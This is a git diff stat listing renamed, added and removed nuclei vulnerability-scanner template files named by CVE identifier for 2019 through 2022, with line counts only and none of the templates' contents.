nuclei-templates/CVE-2019/cve-2019-11370.yaml | 45 - nuclei-templates/CVE-2019/cve-2019-13396.yaml | 51 + ...VE-2019-14205.yaml => cve-2019-14205.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-14251.yaml | 38 + nuclei-templates/CVE-2019/cve-2019-14696.yaml | 33 + nuclei-templates/CVE-2019/cve-2019-15107.yaml | 37 + nuclei-templates/CVE-2019/cve-2019-15811.yaml | 49 + ...VE-2019-15859.yaml => cve-2019-15859.yaml} | 0 ...VE-2019-16332.yaml => cve-2019-16332.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-1653.yaml | 31 + nuclei-templates/CVE-2019/cve-2019-16932.yaml | 48 + nuclei-templates/CVE-2019/cve-2019-16996.yaml | 36 + nuclei-templates/CVE-2019/cve-2019-18665.yaml | 37 - ...VE-2019-19134.yaml => cve-2019-19134.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-19985.yaml | 43 + nuclei-templates/CVE-2019/cve-2019-20210.yaml | 44 - nuclei-templates/CVE-2019/cve-2019-20354.yaml | 32 + nuclei-templates/CVE-2019/cve-2019-20933.yaml | 39 - ...{CVE-2019-2588.yaml => cve-2019-2588.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-2616.yaml | 31 + nuclei-templates/CVE-2019/cve-2019-3912.yaml | 29 + ...{CVE-2019-7192.yaml => cve-2019-7192.yaml} | 0 ...{CVE-2019-7238.yaml => cve-2019-7238.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-7254.yaml | 35 + nuclei-templates/CVE-2019/cve-2019-7315.yaml | 35 + nuclei-templates/CVE-2019/cve-2019-7609.yaml | 45 + nuclei-templates/CVE-2019/cve-2019-8442.yaml | 29 + nuclei-templates/CVE-2019/cve-2019-8451.yaml | 36 + nuclei-templates/CVE-2019/cve-2019-9041.yaml | 36 + nuclei-templates/CVE-2019/cve-2019-9915.yaml | 38 - nuclei-templates/CVE-2019/cve-2019-9922.yaml | 36 - nuclei-templates/CVE-2020/CVE-2020-10220.yaml | 52 - ...ve-2020-10549.yaml => CVE-2020-10549.yaml} | 0 ...{cve-2020-1147.yaml => CVE-2020-1147.yaml} | 0 ...ve-2020-11529.yaml => CVE-2020-11529.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-11978.yaml | 57 + nuclei-templates/CVE-2020/CVE-2020-11991.yaml | 47 - nuclei-templates/CVE-2020/CVE-2020-12271.yaml | 17 - ...ve-2020-12720.yaml => CVE-2020-12720.yaml} | 0 ...ve-2020-13117.yaml => CVE-2020-13117.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-13121.yaml | 24 - nuclei-templates/CVE-2020/CVE-2020-13945.yaml | 61 - ...ve-2020-14750.yaml => CVE-2020-14750.yaml} | 0 ...ve-2020-14883.yaml => CVE-2020-14883.yaml} | 0 ...ve-2020-15004.yaml => CVE-2020-15004.yaml} | 0 ...ve-2020-15129.yaml => CVE-2020-15129.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-15227.yaml | 22 - ...ve-2020-15500.yaml => CVE-2020-15500.yaml} | 0 ...ve-2020-15505.yaml => CVE-2020-15505.yaml} | 0 ...ve-2020-15568.yaml => CVE-2020-15568.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-16846.yaml | 41 - ...ve-2020-16952.yaml => CVE-2020-16952.yaml} | 0 ...ve-2020-17518.yaml => CVE-2020-17518.yaml} | 0 ...ve-2020-17519.yaml => CVE-2020-17519.yaml} | 0 ...ve-2020-18268.yaml => CVE-2020-18268.yaml} | 0 ...{cve-2020-1938.yaml => CVE-2020-1938.yaml} | 0 ...{cve-2020-1943.yaml => CVE-2020-1943.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-2096.yaml | 43 - ...{cve-2020-2103.yaml => CVE-2020-2103.yaml} | 0 ...ve-2020-21224.yaml => CVE-2020-21224.yaml} | 0 ...{cve-2020-2140.yaml => CVE-2020-2140.yaml} | 0 ...{cve-2020-2199.yaml => CVE-2020-2199.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-22208.yaml | 32 + nuclei-templates/CVE-2020/CVE-2020-22210.yaml | 23 + nuclei-templates/CVE-2020/CVE-2020-22211.yaml | 32 + nuclei-templates/CVE-2020/CVE-2020-22840.yaml | 19 - ...ve-2020-23015.yaml => CVE-2020-23015.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-23517.yaml | 24 - nuclei-templates/CVE-2020/CVE-2020-23575.yaml | 31 - ...ve-2020-23972.yaml => CVE-2020-23972.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-24186.yaml | 89 - ...ve-2020-24312.yaml => CVE-2020-24312.yaml} | 0 ...ve-2020-24550.yaml => CVE-2020-24550.yaml} | 0 ...ve-2020-24571.yaml => CVE-2020-24571.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-24609.yaml | 1 - ...ve-2020-24765.yaml => CVE-2020-24765.yaml} | 0 ...ve-2020-24949.yaml => CVE-2020-24949.yaml} | 0 ...ve-2020-25223.yaml => CVE-2020-25223.yaml} | 0 ...ve-2020-25780.yaml => CVE-2020-25780.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-25864.yaml | 50 - ...ve-2020-26413.yaml => CVE-2020-26413.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-27361.yaml | 35 - ...ve-2020-28188.yaml => CVE-2020-28188.yaml} | 0 ...ve-2020-28208.yaml => CVE-2020-28208.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-28351.yaml | 42 - nuclei-templates/CVE-2020/CVE-2020-29597.yaml | 49 + ...{cve-2020-3187.yaml => CVE-2020-3187.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-35234.yaml | 30 + nuclei-templates/CVE-2020/CVE-2020-35489.yaml | 22 - nuclei-templates/CVE-2020/CVE-2020-3580.yaml | 45 - nuclei-templates/CVE-2020/CVE-2020-35847.yaml | 30 - ...ve-2020-35951.yaml => CVE-2020-35951.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-36112.yaml | 59 - ...ve-2020-36365.yaml => CVE-2020-36365.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-36510.yaml | 35 + nuclei-templates/CVE-2020/CVE-2020-4038.yaml | 31 - ...{cve-2020-4463.yaml => CVE-2020-4463.yaml} | 0 ...{cve-2020-5284.yaml => CVE-2020-5284.yaml} | 0 ...{cve-2020-5307.yaml => CVE-2020-5307.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-5410.yaml | 35 - nuclei-templates/CVE-2020/CVE-2020-5776.yaml | 51 - nuclei-templates/CVE-2020/CVE-2020-5777.yaml | 38 - nuclei-templates/CVE-2020/CVE-2020-6207.yaml | 55 - nuclei-templates/CVE-2020/CVE-2020-6287.yaml | 57 - ...{cve-2020-7136.yaml => CVE-2020-7136.yaml} | 0 ...{cve-2020-7209.yaml => CVE-2020-7209.yaml} | 0 ...{cve-2020-7246.yaml => CVE-2020-7246.yaml} | 0 ...{cve-2020-7961.yaml => CVE-2020-7961.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-8115.yaml | 33 - ...{cve-2020-8163.yaml => CVE-2020-8163.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-8191.yaml | 45 - ...{cve-2020-8209.yaml => CVE-2020-8209.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-8512.yaml | 41 - ...{cve-2020-8771.yaml => CVE-2020-8771.yaml} | 0 ...{cve-2020-8813.yaml => CVE-2020-8813.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-8982.yaml | 40 - ...{cve-2020-9036.yaml => CVE-2020-9036.yaml} | 0 ...{cve-2020-9376.yaml => CVE-2020-9376.yaml} | 0 ...{cve-2020-9402.yaml => CVE-2020-9402.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-10220.yaml | 50 + ...VE-2020-11455.yaml => cve-2020-11455.yaml} | 0 ...VE-2020-11546.yaml => cve-2020-11546.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-11978.yaml | 60 - nuclei-templates/CVE-2020/cve-2020-11991.yaml | 47 + ...VE-2020-12054.yaml => cve-2020-12054.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-12271.yaml | 18 + nuclei-templates/CVE-2020/cve-2020-13121.yaml | 34 + nuclei-templates/CVE-2020/cve-2020-13945.yaml | 58 + nuclei-templates/CVE-2020/cve-2020-16846.yaml | 41 + ...VE-2020-17362.yaml => cve-2020-17362.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-2096.yaml | 40 + nuclei-templates/CVE-2020/cve-2020-22208.yaml | 36 - nuclei-templates/CVE-2020/cve-2020-22210.yaml | 36 - nuclei-templates/CVE-2020/cve-2020-22211.yaml | 36 - nuclei-templates/CVE-2020/cve-2020-22840.yaml | 28 + nuclei-templates/CVE-2020/cve-2020-23517.yaml | 33 + nuclei-templates/CVE-2020/cve-2020-23575.yaml | 37 + nuclei-templates/CVE-2020/cve-2020-24186.yaml | 89 + ...VE-2020-24391.yaml => cve-2020-24391.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-25864.yaml | 47 + nuclei-templates/CVE-2020/cve-2020-27361.yaml | 32 + nuclei-templates/CVE-2020/cve-2020-28351.yaml | 41 + nuclei-templates/CVE-2020/cve-2020-29597.yaml | 54 - nuclei-templates/CVE-2020/cve-2020-35234.yaml | 34 - nuclei-templates/CVE-2020/cve-2020-35489.yaml | 55 + nuclei-templates/CVE-2020/cve-2020-3580.yaml | 43 + nuclei-templates/CVE-2020/cve-2020-35847.yaml | 40 + nuclei-templates/CVE-2020/cve-2020-36112.yaml | 33 + nuclei-templates/CVE-2020/cve-2020-36510.yaml | 42 - nuclei-templates/CVE-2020/cve-2020-4038.yaml | 33 + nuclei-templates/CVE-2020/cve-2020-5410.yaml | 30 + nuclei-templates/CVE-2020/cve-2020-5776.yaml | 46 + nuclei-templates/CVE-2020/cve-2020-5777.yaml | 36 + nuclei-templates/CVE-2020/cve-2020-6207.yaml | 55 + nuclei-templates/CVE-2020/cve-2020-6287.yaml | 55 + nuclei-templates/CVE-2020/cve-2020-8115.yaml | 31 + nuclei-templates/CVE-2020/cve-2020-8191.yaml | 42 + ...{CVE-2020-8497.yaml => cve-2020-8497.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-8512.yaml | 36 + nuclei-templates/CVE-2020/cve-2020-8982.yaml | 34 + ...{CVE-2020-9054.yaml => cve-2020-9054.yaml} | 0 ...{CVE-2020-9757.yaml => cve-2020-9757.yaml} | 0 ...{CVE-20200924a.yaml => cve-20200924a.yaml} | 0 ...{cve-2021-1498.yaml => CVE-2021-1498.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-1499.yaml | 57 - nuclei-templates/CVE-2021/CVE-2021-20031.yaml | 37 - nuclei-templates/CVE-2021/CVE-2021-20090.yaml | 40 - nuclei-templates/CVE-2021/CVE-2021-20091.yaml | 54 - nuclei-templates/CVE-2021/CVE-2021-20092.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-20792.yaml | 52 - ...ve-2021-21234.yaml => CVE-2021-21234.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-21745.yaml | 34 - nuclei-templates/CVE-2021/CVE-2021-21799.yaml | 37 - nuclei-templates/CVE-2021/CVE-2021-21801.yaml | 32 - nuclei-templates/CVE-2021/CVE-2021-21802.yaml | 32 - nuclei-templates/CVE-2021/CVE-2021-21805.yaml | 39 + nuclei-templates/CVE-2021/CVE-2021-21973.yaml | 38 - nuclei-templates/CVE-2021/CVE-2021-21985.yaml | 34 - nuclei-templates/CVE-2021/CVE-2021-22502.yaml | 37 - ...ve-2021-24176.yaml => CVE-2021-24176.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24210.yaml | 15 +- nuclei-templates/CVE-2021/CVE-2021-24226.yaml | 35 - ...ve-2021-24237.yaml => CVE-2021-24237.yaml} | 0 ...ve-2021-24274.yaml => CVE-2021-24274.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24276.yaml | 40 - ...ve-2021-24278.yaml => CVE-2021-24278.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24284.yaml | 62 - nuclei-templates/CVE-2021/CVE-2021-24288.yaml | 29 - ...ve-2021-24291.yaml => CVE-2021-24291.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24316.yaml | 32 - ...ve-2021-24358.yaml => CVE-2021-24358.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24488.yaml | 40 - ...ve-2021-24499.yaml => CVE-2021-24499.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24510.yaml | 50 - ...ve-2021-24746.yaml => CVE-2021-24746.yaml} | 0 ...ve-2021-24762.yaml => CVE-2021-24762.yaml} | 0 ...ve-2021-24838.yaml => CVE-2021-24838.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24926.yaml | 47 - nuclei-templates/CVE-2021/CVE-2021-25033.yaml | 27 - nuclei-templates/CVE-2021/CVE-2021-25063.yaml | 49 - nuclei-templates/CVE-2021/CVE-2021-25085.yaml | 37 - nuclei-templates/CVE-2021/CVE-2021-25112.yaml | 52 - nuclei-templates/CVE-2021/CVE-2021-25281.yaml | 40 - nuclei-templates/CVE-2021/CVE-2021-25646.yaml | 78 - nuclei-templates/CVE-2021/CVE-2021-26247.yaml | 39 - nuclei-templates/CVE-2021/CVE-2021-26598.yaml | 57 - nuclei-templates/CVE-2021/CVE-2021-26855.yaml | 36 - nuclei-templates/CVE-2021/CVE-2021-27132.yaml | 29 + nuclei-templates/CVE-2021/CVE-2021-27519.yaml | 38 + nuclei-templates/CVE-2021/CVE-2021-27561.yaml | 43 - nuclei-templates/CVE-2021/CVE-2021-28149.yaml | 56 - ...ve-2021-28150.yaml => CVE-2021-28150.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-28151.yaml | 68 - nuclei-templates/CVE-2021/CVE-2021-28164.yaml | 35 - nuclei-templates/CVE-2021/CVE-2021-28377.yaml | 27 + ...ve-2021-28918.yaml => CVE-2021-28918.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-29203.yaml | 52 - ...ve-2021-29441.yaml => CVE-2021-29441.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-29442.yaml | 30 - nuclei-templates/CVE-2021/CVE-2021-29484.yaml | 42 - ...ve-2021-29622.yaml => CVE-2021-29622.yaml} | 0 ...ve-2021-29625.yaml => CVE-2021-29625.yaml} | 0 ...ve-2021-30049.yaml => CVE-2021-30049.yaml} | 0 ...{cve-2021-3019.yaml => CVE-2021-3019.yaml} | 0 ...ve-2021-31249.yaml => CVE-2021-31249.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-31537.yaml | 25 - ...ve-2021-31581.yaml => CVE-2021-31581.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-31589.yaml | 43 - nuclei-templates/CVE-2021/CVE-2021-31856.yaml | 41 - nuclei-templates/CVE-2021/CVE-2021-3223.yaml | 35 + nuclei-templates/CVE-2021/CVE-2021-32305.yaml | 34 - nuclei-templates/CVE-2021/CVE-2021-32853.yaml | 40 - ...{cve-2021-3297.yaml => CVE-2021-3297.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-33044.yaml | 57 - nuclei-templates/CVE-2021/CVE-2021-33221.yaml | 32 - nuclei-templates/CVE-2021/CVE-2021-3377.yaml | 28 - ...{cve-2021-3378.yaml => CVE-2021-3378.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-33904.yaml | 25 - nuclei-templates/CVE-2021/CVE-2021-34473.yaml | 35 - nuclei-templates/CVE-2021/CVE-2021-34621.yaml | 106 - nuclei-templates/CVE-2021/CVE-2021-34640.yaml | 52 - nuclei-templates/CVE-2021/CVE-2021-34805.yaml | 35 - ...ve-2021-35265.yaml => CVE-2021-35265.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-35464.yaml | 34 - ...{cve-2021-3577.yaml => CVE-2021-3577.yaml} | 0 ...ve-2021-36380.yaml => CVE-2021-36380.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-36749.yaml | 37 - nuclei-templates/CVE-2021/CVE-2021-37216.yaml | 43 - nuclei-templates/CVE-2021/CVE-2021-37416.yaml | 38 - nuclei-templates/CVE-2021/CVE-2021-37589.yaml | 55 + nuclei-templates/CVE-2021/CVE-2021-37704.yaml | 46 - nuclei-templates/CVE-2021/CVE-2021-37833.yaml | 45 - ...ve-2021-38647.yaml => CVE-2021-38647.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-38702.yaml | 39 - nuclei-templates/CVE-2021/CVE-2021-39312.yaml | 40 - ...ve-2021-39322.yaml => CVE-2021-39322.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-39327.yaml | 43 - ...ve-2021-39350.yaml => CVE-2021-39350.yaml} | 0 ...ve-2021-39501.yaml => CVE-2021-39501.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-40149.yaml | 33 + nuclei-templates/CVE-2021/CVE-2021-40150.yaml | 33 - ...ve-2021-40438.yaml => CVE-2021-40438.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-40539.yaml | 116 - nuclei-templates/CVE-2021/CVE-2021-40875.yaml | 41 - nuclei-templates/CVE-2021/CVE-2021-41174.yaml | 51 - ...ve-2021-41192.yaml => CVE-2021-41192.yaml} | 0 ...ve-2021-41293.yaml => CVE-2021-41293.yaml} | 0 ...ve-2021-41349.yaml => CVE-2021-41349.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-41467.yaml | 40 - nuclei-templates/CVE-2021/CVE-2021-41569.yaml | 28 - ...ve-2021-41653.yaml => CVE-2021-41653.yaml} | 0 ...ve-2021-41691.yaml => CVE-2021-41691.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-41773.yaml | 18 + ...ve-2021-41826.yaml => CVE-2021-41826.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-41878.yaml | 45 - ...ve-2021-41951.yaml => CVE-2021-41951.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-42013.yaml | 61 - ...ve-2021-42258.yaml => CVE-2021-42258.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-42551.yaml | 49 - nuclei-templates/CVE-2021/CVE-2021-42565.yaml | 42 - ...ve-2021-43495.yaml => CVE-2021-43495.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-44529.yaml | 41 - ...ve-2021-44848.yaml => CVE-2021-44848.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-45043.yaml | 40 - nuclei-templates/CVE-2021/CVE-2021-45092.yaml | 31 - nuclei-templates/CVE-2021/CVE-2021-45380.yaml | 42 - nuclei-templates/CVE-2021/CVE-2021-45428.yaml | 43 + nuclei-templates/CVE-2021/CVE-2021-45968.yaml | 39 - nuclei-templates/CVE-2021/CVE-2021-46379.yaml | 28 - ...ve-2021-46381.yaml => CVE-2021-46381.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-46387.yaml | 45 - nuclei-templates/CVE-2021/CVE-2021-46424.yaml | 39 - nuclei-templates/CVE-2021/cve-2021-1499.yaml | 55 + nuclei-templates/CVE-2021/cve-2021-20031.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-20090.yaml | 40 + nuclei-templates/CVE-2021/cve-2021-20091.yaml | 53 + nuclei-templates/CVE-2021/cve-2021-20092.yaml | 58 + nuclei-templates/CVE-2021/cve-2021-20792.yaml | 50 + nuclei-templates/CVE-2021/cve-2021-21745.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-21799.yaml | 43 + nuclei-templates/CVE-2021/cve-2021-21801.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-21802.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-21805.yaml | 46 - ...VE-2021-21816.yaml => cve-2021-21816.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-21973.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-21985.yaml | 36 + nuclei-templates/CVE-2021/cve-2021-22502.yaml | 63 + ...VE-2021-23241.yaml => cve-2021-23241.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-24226.yaml | 34 + nuclei-templates/CVE-2021/cve-2021-24276.yaml | 38 + nuclei-templates/CVE-2021/cve-2021-24284.yaml | 71 + nuclei-templates/CVE-2021/cve-2021-24288.yaml | 27 + ...VE-2021-24298.yaml => cve-2021-24298.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-24316.yaml | 40 + ...VE-2021-24335.yaml => cve-2021-24335.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-24488.yaml | 47 + nuclei-templates/CVE-2021/cve-2021-24510.yaml | 48 + nuclei-templates/CVE-2021/cve-2021-24926.yaml | 45 + nuclei-templates/CVE-2021/cve-2021-25033.yaml | 30 + nuclei-templates/CVE-2021/cve-2021-25063.yaml | 46 + nuclei-templates/CVE-2021/cve-2021-25085.yaml | 42 + nuclei-templates/CVE-2021/cve-2021-25112.yaml | 51 + nuclei-templates/CVE-2021/cve-2021-25281.yaml | 46 + nuclei-templates/CVE-2021/cve-2021-25646.yaml | 84 + nuclei-templates/CVE-2021/cve-2021-26247.yaml | 37 + nuclei-templates/CVE-2021/cve-2021-26598.yaml | 57 + nuclei-templates/CVE-2021/cve-2021-26855.yaml | 34 + nuclei-templates/CVE-2021/cve-2021-27132.yaml | 40 - nuclei-templates/CVE-2021/cve-2021-27519.yaml | 45 - nuclei-templates/CVE-2021/cve-2021-27561.yaml | 48 + nuclei-templates/CVE-2021/cve-2021-28149.yaml | 49 + nuclei-templates/CVE-2021/cve-2021-28151.yaml | 57 + nuclei-templates/CVE-2021/cve-2021-28164.yaml | 41 + nuclei-templates/CVE-2021/cve-2021-28377.yaml | 33 - nuclei-templates/CVE-2021/cve-2021-29203.yaml | 56 + nuclei-templates/CVE-2021/cve-2021-29442.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-29484.yaml | 39 + ...VE-2021-30151.yaml => cve-2021-30151.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-30461.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-31537.yaml | 36 + nuclei-templates/CVE-2021/cve-2021-31589.yaml | 40 + nuclei-templates/CVE-2021/cve-2021-31856.yaml | 38 + ...VE-2021-32172.yaml => cve-2021-32172.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-3223.yaml | 34 - nuclei-templates/CVE-2021/cve-2021-32305.yaml | 34 + nuclei-templates/CVE-2021/cve-2021-32853.yaml | 38 + ...{CVE-2021-3293.yaml => cve-2021-3293.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-33044.yaml | 55 + nuclei-templates/CVE-2021/cve-2021-33221.yaml | 43 + nuclei-templates/CVE-2021/cve-2021-3377.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-33904.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-34473.yaml | 35 + nuclei-templates/CVE-2021/cve-2021-34621.yaml | 112 + nuclei-templates/CVE-2021/cve-2021-34640.yaml | 50 + nuclei-templates/CVE-2021/cve-2021-34805.yaml | 37 + nuclei-templates/CVE-2021/cve-2021-35464.yaml | 50 + nuclei-templates/CVE-2021/cve-2021-36749.yaml | 36 + nuclei-templates/CVE-2021/cve-2021-37216.yaml | 42 + nuclei-templates/CVE-2021/cve-2021-37416.yaml | 45 + ...VE-2021-37580.yaml => cve-2021-37580.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-37589.yaml | 62 - nuclei-templates/CVE-2021/cve-2021-37704.yaml | 45 + nuclei-templates/CVE-2021/cve-2021-37833.yaml | 43 + nuclei-templates/CVE-2021/cve-2021-38702.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-39312.yaml | 44 + ...VE-2021-39316.yaml => cve-2021-39316.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-39327.yaml | 43 + ...VE-2021-39433.yaml => cve-2021-39433.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-40149.yaml | 40 - nuclei-templates/CVE-2021/cve-2021-40150.yaml | 40 + nuclei-templates/CVE-2021/cve-2021-40539.yaml | 116 + ...VE-2021-40868.yaml => cve-2021-40868.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-40875.yaml | 41 + ...VE-2021-40960.yaml => cve-2021-40960.yaml} | 0 ...VE-2021-40978.yaml => cve-2021-40978.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-41174.yaml | 51 + nuclei-templates/CVE-2021/cve-2021-41467.yaml | 40 + nuclei-templates/CVE-2021/cve-2021-41569.yaml | 35 + ...VE-2021-41649.yaml => cve-2021-41649.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-41878.yaml | 40 + nuclei-templates/CVE-2021/cve-2021-42013.yaml | 51 + nuclei-templates/CVE-2021/cve-2021-42551.yaml | 49 + nuclei-templates/CVE-2021/cve-2021-42565.yaml | 42 + ...VE-2021-43496.yaml => cve-2021-43496.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-44529.yaml | 41 + nuclei-templates/CVE-2021/cve-2021-45043.yaml | 40 + nuclei-templates/CVE-2021/cve-2021-45092.yaml | 31 + nuclei-templates/CVE-2021/cve-2021-45380.yaml | 40 + nuclei-templates/CVE-2021/cve-2021-45428.yaml | 48 - nuclei-templates/CVE-2021/cve-2021-45968.yaml | 41 + nuclei-templates/CVE-2021/cve-2021-46379.yaml | 31 + nuclei-templates/CVE-2021/cve-2021-46387.yaml | 43 + nuclei-templates/CVE-2021/cve-2021-46424.yaml | 44 + ...{cve-2022-0148.yaml => CVE-2022-0148.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-0165.yaml | 26 - nuclei-templates/CVE-2022/CVE-2022-0201.yaml | 31 - ...{cve-2022-0271.yaml => CVE-2022-0271.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-0288.yaml | 38 + nuclei-templates/CVE-2022/CVE-2022-0422.yaml | 41 + nuclei-templates/CVE-2022/CVE-2022-0482.yaml | 57 - nuclei-templates/CVE-2022/CVE-2022-0540.yaml | 34 - nuclei-templates/CVE-2022/CVE-2022-0543.yaml | 35 - ...{cve-2022-0591.yaml => CVE-2022-0591.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-0653.yaml | 37 + ...{cve-2022-0692.yaml => CVE-2022-0692.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-0776.yaml | 31 + nuclei-templates/CVE-2022/CVE-2022-0870.yaml | 46 - nuclei-templates/CVE-2022/CVE-2022-1040.yaml | 42 + nuclei-templates/CVE-2022/CVE-2022-1119.yaml | 35 + nuclei-templates/CVE-2022/CVE-2022-1221.yaml | 37 - nuclei-templates/CVE-2022/CVE-2022-1388.yaml | 57 + nuclei-templates/CVE-2022/CVE-2022-1392.yaml | 34 - nuclei-templates/CVE-2022/CVE-2022-1609.yaml | 35 + nuclei-templates/CVE-2022/CVE-2022-1904.yaml | 35 - nuclei-templates/CVE-2022/CVE-2022-1906.yaml | 39 - nuclei-templates/CVE-2022/CVE-2022-21500.yaml | 37 + nuclei-templates/CVE-2022/CVE-2022-2187.yaml | 36 - nuclei-templates/CVE-2022/CVE-2022-22536.yaml | 63 - ...ve-2022-22954.yaml => CVE-2022-22954.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-22963.yaml | 44 + nuclei-templates/CVE-2022/CVE-2022-22972.yaml | 93 - nuclei-templates/CVE-2022/CVE-2022-23131.yaml | 44 - nuclei-templates/CVE-2022/CVE-2022-23134.yaml | 43 - ...ve-2022-23347.yaml => CVE-2022-23347.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-23779.yaml | 61 + nuclei-templates/CVE-2022/CVE-2022-23881.yaml | 35 - nuclei-templates/CVE-2022/CVE-2022-24112.yaml | 80 - nuclei-templates/CVE-2022/CVE-2022-24129.yaml | 31 - nuclei-templates/CVE-2022/CVE-2022-24181.yaml | 39 + nuclei-templates/CVE-2022/CVE-2022-24260.yaml | 49 + ...ve-2022-24288.yaml => CVE-2022-24288.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-2486.yaml | 34 + nuclei-templates/CVE-2022/CVE-2022-2487.yaml | 42 + nuclei-templates/CVE-2022/CVE-2022-26134.yaml | 45 - nuclei-templates/CVE-2022/CVE-2022-26135.yaml | 28 + nuclei-templates/CVE-2022/CVE-2022-26138.yaml | 35 + nuclei-templates/CVE-2022/CVE-2022-26148.yaml | 52 - nuclei-templates/CVE-2022/CVE-2022-26159.yaml | 39 - nuclei-templates/CVE-2022/CVE-2022-26233.yaml | 31 - nuclei-templates/CVE-2022/CVE-2022-26960.yaml | 36 - nuclei-templates/CVE-2022/CVE-2022-27927.yaml | 38 - nuclei-templates/CVE-2022/CVE-2022-28079.yaml | 38 + nuclei-templates/CVE-2022/CVE-2022-28080.yaml | 65 - nuclei-templates/CVE-2022/CVE-2022-28219.yaml | 53 - ...ve-2022-28365.yaml => CVE-2022-28365.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-29014.yaml | 31 - nuclei-templates/CVE-2022/CVE-2022-29298.yaml | 33 - ...ve-2022-29303.yaml => CVE-2022-29303.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-29383.yaml | 42 - nuclei-templates/CVE-2022/CVE-2022-29548.yaml | 37 - nuclei-templates/CVE-2022/CVE-2022-30776.yaml | 38 + nuclei-templates/CVE-2022/CVE-2022-31268.yaml | 40 - nuclei-templates/CVE-2022/CVE-2022-31373.yaml | 36 - nuclei-templates/CVE-2022/CVE-2022-32015.yaml | 29 - nuclei-templates/CVE-2022/CVE-2022-32022.yaml | 44 + nuclei-templates/CVE-2022/CVE-2022-32025.yaml | 46 + nuclei-templates/CVE-2022/CVE-2022-32026.yaml | 47 - nuclei-templates/CVE-2022/CVE-2022-32409.yaml | 31 - 